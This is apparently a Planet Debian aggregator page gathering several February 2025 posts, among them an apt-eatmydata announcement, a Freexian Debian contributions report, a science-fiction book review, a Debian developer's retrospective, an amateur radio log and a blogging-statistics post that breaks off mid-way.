I’m thrilled to introduce apt-eatmydata, now available for Debian and all supported Ubuntu releases!

What Is apt-eatmydata?

If you’ve ever used libeatmydata, you know it’s a nifty little hack that disables fsync() and friends, making package installations way faster by skipping unnecessary disk writes. Normally, you’d have to remember to wrap apt commands manually, like this:

eatmydata apt install texlive-full

But who has time for that? apt-eatmydata takes care of this automagically by integrating eatmydata seamlessly into apt itself! That means every package install is now turbocharged—no extra typing required. 🚀

How to Get It

Debian

If you’re on Debian unstable/testing (or possibly soon in stable-backports), you can install it directly with:

sudo apt install apt-eatmydata

Ubuntu

Ubuntu users already enjoy faster package installation thanks to zstd-compressed packages and to switch to even higher gear I’ve backported apt-eatmydata to all supported Ubuntu releases. Just add this PPA and install:

sudo add-apt-repository ppa:firebuild/apt-eatmydata
sudo apt install apt-eatmydata

And boom! Your apt install times are getting serious upgrade. Let’s run some tests…

# pre-download package to measure only the installation
$ sudo apt install -d linux-headers-6.8.0-53-lowlatency
...
# installation time is 9.35s without apt-eatmydata:
$ sudo time apt install linux-headers-6.8.0-53-lowlatency
...
2.30user 2.12system 0:09.35elapsed 47%CPU (0avgtext+0avgdata 174680maxresident)k
32inputs+1495216outputs (0major+196945minor)pagefaults 0swaps
$ sudo apt install apt-eatmydata
...
$ sudo apt purge linux-headers-6.8.0-53-lowlatency
# installation time is 3.17s with apt-eatmydata:
$ sudo time eatmydata apt install linux-headers-6.8.0-53-lowlatency
2.30user 0.88system 0:03.17elapsed 100%CPU (0avgtext+0avgdata 174692maxresident)k
0inputs+205664outputs (0major+198099minor)pagefaults 0swaps

apt-eatmydata just made installing Linux headers 3x faster!

But Wait, There’s More! 🎁

If you’re automating CI builds, there’s even a GitHub Action to make your workflows faster essentially doing what apt-eatmydata does, just setting it up in less than a second! Check it out here:
👉 GitHub Marketplace: apt-eatmydata

Should You Use It?

🚨 Warning: apt-eatmydata is not for all production environments. If your system crashes mid-install, you might end up with a broken package database. But for throwaway VMs, containers, and CI pipelines? It’s an absolute game-changer. I use it on my laptop, too.

So go forth and install recklessly fast! 🚀

If you run into any issues, feel free to file a bug or drop a comment. Happy hacking!

(To accelerate your CI pipeline or local builds, check out Firebuild, that speeds up the builds, too!)

11 February, 2025 05:04PM by Réczey Bálint

hackergotchi for Kentaro Hayashi

Kentaro Hayashi

Breaking compatibility, upgrade from createrepo-c 0.17.3 to 1.2.0

Recently createrepo-c on Debian unstable was updated from 0.17.3 to 1.2.0. It introduces breaking compatibility about metadata (repodata/*).

In the previous versions, generated metadata was compressed in gz format, newer version use zst compression instead. This kills some yum client to work because old yum client can't handle newer metadata format correctly.

At least, (as far as I know) it affects on Amazon Linux 2 for example.

To keep compatibility with such a old platform, need to specify --compatibility option for createrepo-c.

11 February, 2025 10:15AM

hackergotchi for Freexian Collaborators

Freexian Collaborators

Debian Contributions: Python 3.13 as the default Python 3 version, Fixing qtpaths6 for cross compilation, sbuild support for Salsa CI, Rails 7 transition, DebConf preparations and more! (by Anupa Ann Joseph)

Debian Contributions: 2025-01

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Python 3.13 is now the default Python 3 version in Debian, by Stefano Rivera and Colin Watson

The Python 3.13 as default transition has now completed. The next step is to remove Python 3.12 from the archive, which should be very straightforward, it just requires rebuilding C extension packages in no particular order. Stefano fixed some miscellaneous bugs blocking the completion of the 3.13 as default transition.

Fixing qtpaths6 for cross compilation, by Helmut Grohne

While Qt5 used to use qmake to query installation properties, Qt6 is moving more and more to CMake and to ease that transition it relies on more qtpaths. Since this tool is not naturally aware of the architecture it is called for, it tends to produce results for the build architecture. Therefore, more than 100 packages were picking up a multiarch directory for the build architecture during cross builds. In collaboration with the Qt/KDE team and Sandro Knauß in particular (none affiliated with Freexian), we added an architecture-specific wrapper script in the same way qmake has one for Qt5 and Qt6 already. The relevant CMake module has been updated to prefer the triplet-prefixed wrapper. As a result, most of the KDE packages now cross build on unstable ready in time for the trixie release.

/usr-move, by Helmut Grohne

In December, Emil Södergren reported that a live-build was not working for him and in January, Colin Watson reported that the proposed mitigation for debian-installer-utils would practically fail. Both failures were to be attributed to a wrong understanding of implementation-defined behavior in dpkg-divert. As a result, all M18 mitigations had to be reviewed and many of them replaced. Many have been uploaded already and all instances have received updated patches.

Even though dumat has been in operation for more than a year, it gained recent changes. For one thing, analysis of architectures other than amd64 was requested. Chris Hofstaedler (not affiliated with Freexian) kindly provided computing resources for repeatedly running it on the larger set. Doing so revealed various cross-architecture undeclared file conflicts in gcc, glibc, and binutils-z80, but it also revealed a previously unknown /usr-move issue in rpi.rpi-common. On top of that, dumat produced false positive diagnostics and wrongly associated Debian bugs in some cases, both of which have now been fixed. As a result, a supposedly fixed python3-sepolicy issue had to be reopened.

rebootstrap, by Helmut Grohne

As much as we think of our base system as stable, it is changing a lot and the architecture cross bootstrap tooling is very sensitive to such changes requiring permanent maintenance. A problem that recently surfaced was that building a binutils cross toolchain would result in a binutils-for-host package that would not be practically installable as it would depend on a binutils-common package that was not built. This turned into an examination of binutils-common and noticing that it actually differed across architectures even though it should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut provided a patch to move gprofng bits out of binutils-common. Independently, Matthias Klose (not affiliated with Freexian) split out binutils-gold into a separate source package. As a result, binutils-common is now equal across architectures and can be marked Multi-Arch: foreign resolving the initial problem.

Salsa CI, by Santiago Ruano Rincón

Santiago continued the work about the sbuild support for Salsa CI, that was mentioned in the previous month report. The !568 merge request that created the new build image was merged, making it easier to test !569 with external projects. Santiago used a fork of the debusine repo to try the draft !569, and some issues were spotted, and part of them fixed. This is the last debusine pipeline run with the current !569: https://salsa.debian.org/santiago/debusine/-/pipelines/794233. One of the last improvements relates to how to enable projects to customize the pipeline, in an equivalent way than they currently do in the extract-source and build jobs. While this is work-in-progress, the results are rather promising. Next steps include deciding on introducing schroot support for bookworm, bookworm-security, and older releases, as they are done in the official debian buildd.

DebConf preparations, by Stefano Rivera and Santiago Ruano Rincón

DebConf will be happening in Brest, France, in July. Santiago continued the DebConf 25 organization work, looking for catering providers.

Both Stefano and Santiago have been reaching out to some potential sponsors. DebConf depends on sponsors to cover the organization cost, if your company depends on Debian, please consider sponsoring DebConf.

Stefano has been winding up some of the finances from previous DebConfs. Finalizing reimbursements to team members from DebConf 23, and handling some outstanding issues from DebConf 24. Stefano and the rest of the DebConf committee have been reviewing bids for DebConf 26, to select the next venue.

Ruby 3.3 is now the default Ruby interpreter, by Lucas Kanashiro

Ruby 3.3 is about to become the default Ruby interpreter for Trixie. Many bugs were fixed by Lucas and the Debian Ruby team during the sprint hold in Paris during Jan 27-31. The next step is to remove support of Ruby 3.1, which is the alternative Ruby interpreter for now. Thanks to the Debian Release team for all the support, especially Emilio Pozuelo Monfort.

Rails 7 transition, by Lucas Kanashiro

Rails 6 has been shipped by Debian since Bullseye, and as a WEB framework, many issues (especially security related issues) have been encountered and the maintainability of it becomes harder and harder. With that in mind, during the Debian Ruby team sprint last month, the transition to Rack 3 (an important dependency of rails containing many breaking changes) was started in Debian unstable, it is ongoing. Once it is done, the Rails 7 transition will take place, and Rails 7 should be shipped in Debian Trixie.

Miscellaneous contributions

  • Stefano improved a poor ImportError for users of the turtle module on Python 3, who haven’t installed the python3-tk package.
  • Stefano updated several packages to new upstream releases.
  • Stefano added the Python extension to the re2 package, allowing for the use of the Google RE2 regular expression library as a direct replacement for the standard library re module.
  • Stefano started provisioning a new physical server for the debian.social infrastructure.
  • Carles improved simplemonitor (documentation on systemd integration, worked with upstream for fixing a bug).
  • Carles upgraded packages to new upstream versions: python-ring-doorbell and python-asyncclick.
  • Carles did po-debconf translations to Catalan: reviewed 44 packages and submitted translations to 90 packages (via salsa merge requests or bugtracker bugs).
  • Carles maintained po-debconf-manager with small fixes.
  • Raphaël worked on some outstanding DEP-14 merge request and participated in the associated discussion. The discussions have been more contentious than anticipated, somewhat exacerbated by Otto’s desire to conclude fast while the required tool support is not yet there.
  • Raphaël, with the help of Philipp Kern from the DSA team, upgraded tracker.debian.org to use Django 4.2 (from bookworm-backports) which in turn enabled him to configure authentication via salsa.debian.org. It’s now possible to login to tracker.debian.org with your salsa credentials!
  • Raphaël updated zim — a nice desktop wiki that is very handy to organize your day-to-day digital life — to the latest upstream version (0.76).
  • Helmut sent patches for 10 cross build failures.
  • Helmut continued working on a tool for memory-based concurrency limit of builds.
  • Helmut NMUed libtool, opensysusers and virtualbox.
  • Enrico tried to support Helmut in working out tricky usrmerge situations
  • Thorsten Alteholz uploaded a new upstream version of brlaser.
  • Colin Watson upgraded 33 Python packages to new upstream versions, including fixes for CVE-2024-42353, CVE-2024-47532, and CVE-2025-22153.
  • Emilio Pozuelo managed various transitions, and fixed various RC bugs (telepathy-glib, xorg, xserver-xorg-video-vesa, apitrace, mesa).
  • Anupa attended the monthly team meeting for Debian publicity team and shared the social media stats.
  • Anupa assisted Jean-Pierre Giraud in the point release announcement for Debian 12.9 and published the Micronews.
  • Anupa took part in multiple Debian publicity team discussions regarding our presence in social media platforms.

11 February, 2025 12:00AM by Anupa Ann Joseph

February 10, 2025

Petter Reinholdtsen

Some of my 2024 free software activities

It is a while since I posted a summary of the free software and open culture activities and projects I have worked on. Here is a quick summary of the major ones from last year.

I guess the biggest project of the year has been migrating orphaned packages in Debian without a version control system to have a git repository on salsa.debian.org. When I started in April around 450 the orphaned packages needed git. I've since migrated around 250 of the packages to a salsa git repository, and around 40 packages were left when I took a break. Not sure who did the around 160 conversions I was not involved in, but I am very glad I got some help on the project. I stopped partly because some of the remaining packages needed more disk space to build than I have available on my development machine, and partly because some had a strange build setup I could not figure out. I had a time budget of 20 minutes per package, if the package proved problematic and likely to take longer, I moved to another package. Might continue later, if I manage to free up some disk space.

Another rather big project was the translation to Norwegian Bokmål and publishing of the first book ever published by a Sámi woman, the «Møter vi liv eller død?» book by Elsa Laula, with a PD0 and CC-BY license. I released it during the summer, and to my surprise it has already sold several copies. As I suck at marketing, I did not expect to sell any.

A smaller, but more long term project (for more than 10 years now), and related to orphaned packages in Debian, is my project to ensure a simple way to install hardware related packages in Debian when the relevant hardware is present in a machine. It made a fairly big advance forward last year, partly because I have been poking and begging package maintainers and upstream developers to include AppStream metadata XML in their packages. I've also released a few new versions of the isenkram system with some robustness improvements. Today 127 packages in Debian provide such information, allowing isenkram-lookup to propose them. Will keep pushing until the around 35 package names currently hard coded in the isenkram package are down to zero, so only information provided by individual packages are used for this feature.

As part of the work on AppStream, I have sponsored several packages into Debian where the maintainer wanted to fix the issue but lacked direct upload rights. I've also sponsored a few other packages, when approached by the maintainer.

I would also like to mention two hardware related packages in particular where I have been involved, the megactl and mfi-util packages. Both work with the hardware RAID systems in several Dell PowerEdge servers, and the first one is already available in Debian (and of course, proposed by isenkram when used on the appropriate Dell server), the other is waiting for NEW processing since this autumn. I manage several such Dell servers and would like the tools needed to monitor and configure these RAID controllers to be available from within Debian out of the box.

Vaguely related to hardware support in Debian, I have also been trying to find ways to help out the Debian ROCm team, to improve the support in Debian for my artificial idiocy (AI) compute node. So far only uploaded one package, helped test the initial packaging of llama.cpp and tried to figure out how to get good speech recognition like Whisper into Debian.

I am still involved in the LinuxCNC project, and organised a developer gathering in Norway last summer. A new one is planned the summer of 2025. I've also helped evaluate patches and uploaded new versions of LinuxCNC into Debian.

After a 10 years long break, we managed to get a new and improved upstream version of lsdvd released just before Christmas. As I use it regularly to maintain my DVD archive, I was very happy to finally get out a version supporting DVDDiscID useful for uniquely identifying DVDs. I am dreaming of a Internet service mapping DVD IDs to IMDB movie IDs, to make life as a DVD collector easier.

My involvement in Norwegian archive standardisation and the free software implementation of the vendor neutral Noark 5 API continued for the entire year. I've been pushing patches into both the API and the test code for the API, participated in several editorial meetings regarding the Noark 5 Tjenestegrensesnitt specification, submitted several proposals for improvements for the same. We also organised a small seminar for Noark 5 interested people, and is organising a new seminar in a month.

Part of the year was spent working on and coordinating a Norwegian Bokmål translation of the marvellous children's book «Ada and Zangemann», which focus on the right to repair and control your own property, and the value of controlling the software on the devices you own. The translation is mostly complete, and is now waiting for a transformation of the project and manuscript to use Docbook XML instead of a home made semi-text based format. Great progress is being made and the new book build process is almost complete.

I have also been looking at how to companies in Norway can use free software to report their accounting summaries to the Norwegian government. Several new regulations make it very hard for companies to do use free software for accounting, and I would like to change this. Found a few drafts for opening up the reporting process, and have read up on some of the specifications, but nothing much is working yet.

These were just the top of the iceberg, but I guess this blog post is long enough now. If you would like to help with any of these projects, please get in touch, either directly on the project mailing lists and forums, or with me via email, IRC or Signal. :)

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

10 February, 2025 08:30AM

Russ Allbery

Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer

Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458

The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stand alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book.

Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder.

Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem.

So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.

SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS.

"Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?"

"Oh, no, I am not missing this," Isla said, and got out of the podcar.

"I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"

Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.

"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened."

"And then?"

"And then the bad things on the other side, who we were trying to lock away, will be free to travel through."

Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun.

The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments.

We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well.

There are also more sentient ships, and I am so in favor of more sentient ships.

"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."

We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into.

There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts.

Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly.

This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended.

Followed by Ghostdrift.

Rating: 9 out of 10

10 February, 2025 04:03AM

February 09, 2025

hackergotchi for Philipp Kern

Philipp Kern

20 years

20 years ago, I got my Debian Developer account. I was 18 at the time, it was Shrove Tuesday and - as is customary - I was drunk when I got the email. There was so much that I did not know - which is also why the process took 1.5 years from the time I applied. I mostly only maintained a package or two. I'm still amazed that Christian Perrier and Joerg Jaspert put sufficient trust in me at that time. Nevertheless now feels like a good time for a personal reflection of my involvement in Debian.

During my studies I took on more things. In January 2008 I joined the Release Team as an assistant, which taught me a lot of code review. I have been an Application Manager on the side.

Going to my first Debconf was really a turning point. My first one was Mar del Plata in Argentina in August 2008, when I was 21. That was quite an excitement, traveling that far from Germany for the first time. The personal connections I made there made quite the difference. It was also a big boost for motivation. I attended 8 (Argentina), 9 (Spain), 10 (New York), 11 (Bosnia and Herzegovina), 12 (Nicaragua), 13 (Switzerland), 14 (Portland), 15 (Germany), 16 (South Africa), and hopefully I'll make it to this year's in Brest. At all of them I did not see much of the countries as I prioritized all of my time focused on Debian, even skipping some of the day trips in favor of team meetings. Yet I am very grateful to the project (and to my employer) for shipping me there.

I ended up as Stable Release Manager for a while, from August 2008 - when Martin Zobel-Helas moved into DSA - until I got dropped in March 2020. I think my biggest achievements were pushing for the creation of -updates in favor of a separate volatile archive and a change of the update policy to allow for more common sense updates in the main archive vs. the very strict "breakage or security" policy we had previously. I definitely need to call out Adam D. Barratt for being the partner in crime, holding up the fort for even longer.

In 2009 I got too annoyed at the existing wanna-build team not being responsive anymore and pushed for the system to be given to a new team. I did not build it and significant contributions were done by other people (like Andreas Barth and Joachim Breitner, and later Aurelien Jarno). I mostly reworked the way the system was triggered, investigated when it broke and was around when people wanted things merged.

In the meantime I worked sys/netadmin jobs while at university, both paid and as a volunteer with the students' council. For a year or two I was the administrator of a System z mainframe IBM donated to my university. We had a mainframe course and I attended two related conferences. That's where my s390(x) interest came from, although credit for the port needs to go to Aurelien Jarno.

Since completing university in 2013 I have been working for a company for almost 12 years. Debian experience was very relevant to the job and I went on maintaining a Linux distro or two at work - before venturing off into security hardening. People in megacorps - in my humble opinion - disappear from the volunteer projects because a) they might previously have been studying and thus had a lot more time on their hands and b) the job is too similar to the volunteer work and thus the same brain cells used for work are exhausted and can't be easily reused for volunteer work. I kept maintaining a couple of things (buildds, some packages) - mostly because of a sense of commitment and responsibility, but otherwise kind of scaled down my involvement. I also felt less connected as I dropped off IRC.

Last year I finally made it to Debian events again: MiniDebconf in Berlin, where we discussed the aftermath of the xz incident, and the Debian BSP in Salzburg. I rejoined IRC using the Matrix bridge. That also rekindled my involvement, with me guiding a new DD through NM and ending up in DSA. To be honest, only in the last two or three years I felt like a (more) mature old-timer.

I have a new gig at work lined up to start soon and next to that I have sysadmining for Debian. It is pretty motivating to me that I can just get things done - something that is much harder to achieve at work due to organizational complexities. It balances out some frustration I'd otherwise have. The work is different enough to be enjoyable and the people I work with are great.

The future

I still think the work we do in Debian is important, as much as I see a lack of appreciation in a world full of containers. We are reaping most of the benefits of standing on the shoulders of giants and of great decisions made in the past (e.g. the excellent Debian policy, but also the organizational model) that made Debian what it is today.

Given the increase in size and complexity of what Debian ships - and the somewhat dwindling resource of developer time, it would benefit us to have better processes for large-scale changes across all packages. I greatly respect the horizontal effects that are currently being driven and that suck up a lot of energy.

A lot of our infrastructure is also aging and not super well maintained. Many take it for granted that the services we have keep existing, but most are only maintained by a person or two, if even. Software stacks are aging and it is even a struggle to have all necessary packages in the next release.

Hopefully I can contribute a bit or two to these efforts in the future.

09 February, 2025 11:43PM by Philipp Kern (noreply@blogger.com)

Dave Hibberd

Radio Activity 10-16 Feb 2025

It’s been quite the week of radio related nonsense for me, where I’ve been channelling my time and brainspace for radio into activity on air and system refinements, not working on Debian.

POTA, Antennas and why do my toys not work?

Having had my interest piqued by Ian at mastodon.radio, I looked online and spotted a couple of parks within stumbling distance of my house, that’s good news! It looks like the list has been refactored and expanded since I last looked at it, so there are now more entities to activate and explore.

My concerns about antennas noted last week rumbled on. There was a second strand to this concern too, my end fed 64:1 (or 49:1?!) transformer from MM0OPX sits in my mind as not having worked very well in Spain last year, and I want to get to the bottom of why. As with most things in my life, it’s probably a me problem.

I came up with a cunning plan - firstly, buy a new mast to replace the one I broke a few weeks back on Cat Law.

Secondly, buy a couple of new connectors and some heatshrink to reterminate my cable that I’m sure is broken.

Spending more money on a problem never hurt anyone, right?

Come Wednesday, the new toys arrived and I figured combining everything into one convenient night time walk and radio was a good plan.

So I walk out to the nearest park with my LoRa APRS doofer going and see what happens:

APRS-Map

After circling a bit to find somewhere suitable (there appear to be construction works in the park!) I set up my gear in 2C with frost on the ground, called CQ, spotted and got nothing on either the end fed half wave or the cheap vertical.

As it was too late for 20m, I tried 40 and a bit of 80 using the inbuilt tuner, but wasn’t heard by stations I called or when calling independently.

I packed everything up and lora-doofered my way home, mildly deflated.

Try it at home

It still didn’t sit with me that the end fed wasn’t working, so come Friday night I set it up in the back garden/woods behind the house to try and diagnose why it wasn’t working.

Up it went, I worked some Irish stations pretty effortlessly, and down everything came. No complaints - the only things I did differently was have the feedpoint a little higher and check my power, limiting it to 10W. The G90 can do 20W, I wonder if running at that was saturating the core in the 64:1.

At some point in the evening I stepped in some dog’s shit too, and spent some time cleaning my boots outside to avoid further tramping the smell through the house.

Win some, lose some.

Take it to the Hills

On Friday, some of the other GM-ES Sota-ists had been out for an activity day.

On account of me being busy in work, I couldn’t go outside to play, but I figured a weekend of activity was on the books.

Saturday - A day above the clouds

On Saturday I took myself up Tap O’ Noth, a favourite of mine for some reason, and Lord Arthur’s Hill.

Before I hit the hills, I took myself to the hackerspace and printed myself a K6ARK Winder and a guy ring for the mast, cut string, tied it together and wound the string on to the winder.

I also took time to buzz out my wonky coax and it showed great continuity. Hmm, that can be continued later. I didn’t quite get to crimping the radial network of the Aliexpress whip with a 12mm stud crimp, that can also be put on the TODO list.

Tap O’ Noth

Once finally out, the weather was a bit cloudy with passing snow showers, but in between the showers I was above the clouds and the air was clear:

After a mild struggle on 2m, I set up the end fed the first hill and got to work from the old hill fort:

The end fed worked flawlessly. Exactly as promised, switching between 7MHz, 14MHz, 21MHz and 28MHz without a tuner was perfect, I chased hills on all the bands, and had a great time. Apart from 40m, where there was absolutely no space due to a contest. That wasn’t such a fun time!

My fingers were bitterly cold, so on went the big gloves for the descent and I felt like I was warm by the time I made it back to the car.

It worked so well, in fact, I took the 1/4 wave cheap vertical out my bag and decided to brave it on the next activation.

Lord Arthur’s Hill

GM5ALX has posted a .gpx to sotlas which is shorter than the other ascent, but much sharper - I figured this would be a fun new way to try up the hill!

It takes you right through the heart of the Littlewood Park estate, and I felt a bit uncomfortable walking straight past the estate cottages, especially when there were vehicles moving and active work happening. Presumably this is where Lord Arthur lived, at the foot of his hill.

I cut through the woods to the west of the cottages, disturbing some deer and many, many pheasants, but I met the path fairly quickly. From there it was a 2km walk, 300m vertical ascent. Short and sharp!

At the top, I was treated to a view of the hill I had activated only an hour or so before, which is a view that always makes me smile:

To get some height for the feedpoint, I wrapped the coax around my winder a couple of turns and trapped it with the elastic while draping the coax over the trig. This bought me some more height and I felt clever because of it. Maybe a pole would be easier?

From here, I worked inter-G on 40m and had a wee pile up, eventually working 15 or so European stations on 20m. Pleased with that!

I had been considering a third hill, but home was the call in the failing light. Back to the car I walked to find my key didn’t have any battery, so out came the Audi App and I used the Internet of Things to unlock my car. The modern world is bizarre.

Sunday - Cloudy Head // Head in the Clouds

Sunday started off migraney, so I stayed within the confines of my house until I felt safe driving! After some back and forth in my cloudy head, I opted for the easier option of Ladylea Hill as I wasn’t feeling up for major physical exertion.

It was a long drive, after which I felt more wonky, but I hit the path eventually - I run to Hibby Standard Time, a few hours to a few days behind the rest of GM/ES. I was ready to bail if my head didn’t improve, but it turns out, fresh cold air, silence and bloodflow helped.

Ladylea Hill was incredibly quiet, a feature I really appreciated. It feels incredibly remote, with a long winding drive down Glenbuchat, which still has ice on the surface of the lochs and standing water.

A brooding summit crowned with grey cloud in fantastic scenery that only revealed itself upon the clouds blowing through:

I set up at the cairn and picked up 30 contacts overall, split between 40m and 20m, with some inter-g on 40 and a couple of continental surprises. 20 had longer skip today, so I saw Spain, Finland, Slovenia, Poland.

On teardown, I managed to snap the top segment of my brand new mast with my cold, clumsy fingers, but thankfully sotabeams stock replacements. More money at the problem, again.

Back to the car, no app needed, and homeward bound as the light faded.

At the end of the weekend, I find myself finally over 100 activator points and over 400 chaser points. Somehow I’ve collected more points this year already than last year, the winter bonuses really do stack up!

Addendum - OSMAnd & Open Street Map

I’ve been using OSMAnd on my iPhone quite extensively recently, I think offline mapping is super important if you’re going out to get mildly lost in the hills. On more than one occasion, I have confidently set off in the wrong direction in the mist, and maps have saved my bacon!

As you can download .gpx files, it’s great to have them on the device and available for guidance in case you get lost, coupled with an offline map. Plus, as I drive around I love to have the dark red of a hill I’ve walked appear on the map in my car dash or in my hand:

This weekend I discovered it’s possible to have height maps for nice 3d maps and contours marked on the map - you just need to download some additions for the maps. This is a really nice feature, it makes maps more pretty and more useful when you’re in the middle of nowhere.

Open Street Map also has designators for SOTA summits here and similar for POTA here

GM5ALX has set to adding the summits around Scotland here.

While the benefits aren’t immediately obvious, it allows developers of mapping applications access to more data at no extra cost, really. It helps add depth to an already rich set of information, and allows us as radio amateurs to do more interesting things with maps and not be shackled to Apple/Google.

Because it’s open data, we can also fix things we find wrong as users. I like to fix road surfaces after I’ve been cycling as that will feed forward to route planning through Komoot and data on my wahoo too, which can be modified with osm maps.

In the future, it’s possible to have an OSMAnd plugin highlighting local SOTA summits or mimicking features of sotl.as but offline.

It’s cool to be able to put open technologies to use like this in the field and really is the convergence point of all my favourite things!

09 February, 2025 08:00PM

Antoine Beaupré

A slow blogging year

Well, 2024 will be remembered, won't it? I guess 2025 already wants to make its mark too, but let's not worry about that right now, and instead let's talk about me.

A little over a year ago, I was gloating over how I had such a great blogging year in 2022, and was considering 2023 to be average, then went on to gather more stats and traffic analysis... Then I said, and I quote:

I hope to write more next year. I've been thinking about a few posts I could write for work, about how things work behind the scenes at Tor, that could be informative for many people. We run a rather old setup, but things hold up pretty well for what we throw at it, and it's worth sharing that with the world...

What a load of bollocks.

A bad year for this blog

2024 was the second worst year ever in my blogging history, tied with 2009 at a measly 6 posts for the year:

anarcat@angela:anarc.at$ curl -sSL https://anarc.at/blog/ | grep 'href="\./' | grep -o 20[0-9][0-9] | sort | uniq -c | sort -nr | grep -v 2025 | tail -3
      6 2024
      6 2009
      3 2014

I did write about my work though, detailing the migration from Gitolite to GitLab we completed that year. But after August, total radio silence until now.

Loads of drafts

It's not that I have nothing to say: I have no less than five drafts in my working tree here, not counting three actual drafts recorded in the Git repository here:

anarcat@angela:anarc.at$ git s blog
## main...origin/main
?? blog/bell-bot.md
?? blog/fish.md
?? blog/kensington.md
?? blog/nixos.md
?? blog/tmux.md
anarcat@angela:anarc.at$ git grep -l '\!tag draft'
blog/mobile-massive-gallery.md
blog/on-dying.mdwn
blog/secrets-recovery.md

I just don't have time to wrap those things up. I think part of me is disgusted by seeing my work stolen by large corporations to build proprietary large language models while my idols have been pushed to suicide for trying to share science with the world.

Another part of me wants to make those things just right. The "tagged drafts" above are nothing more than a huge pile of chaotic links, far from being useful for anyone else than me, and even then.

The on-dying article, in particular, is becoming my nemesis. I've been wanting to write that article for over 6 years now, I think. It's just too hard.

Writing elsewhere

There's also the fact that I write for work already. A lot. Here are the top-10 contributors to our team's wiki:

anarcat@angela:help.torproject.org$ git shortlog --numbered --summary --group="format:%al" | head -10
  4272  anarcat
   423  jerome
   117  zen
   116  lelutin
   104  peter
    58  kez
    45  irl
    43  hiro
    18  gaba
    17  groente

... but that's a bit unfair, since I've been there half a decade. Here's the last year:

anarcat@angela:help.torproject.org$ git shortlog --since=2024-01-01 --numbered --summary --group="format:%al" | head -10
   827  anarcat
   117  zen
   116  lelutin
    91  jerome
    17  groente
    10  gaba
     8  micah
     7  kez
     5  jnewsome
     4  stephen.swift

So I still write the most commits! But to truly get a sense of the amount I wrote in there, we should count actual changes. Here it is by number of lines (from commandlinefu.com):

anarcat@angela:help.torproject.org$ git ls-files | xargs -n1 git blame --line-porcelain | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
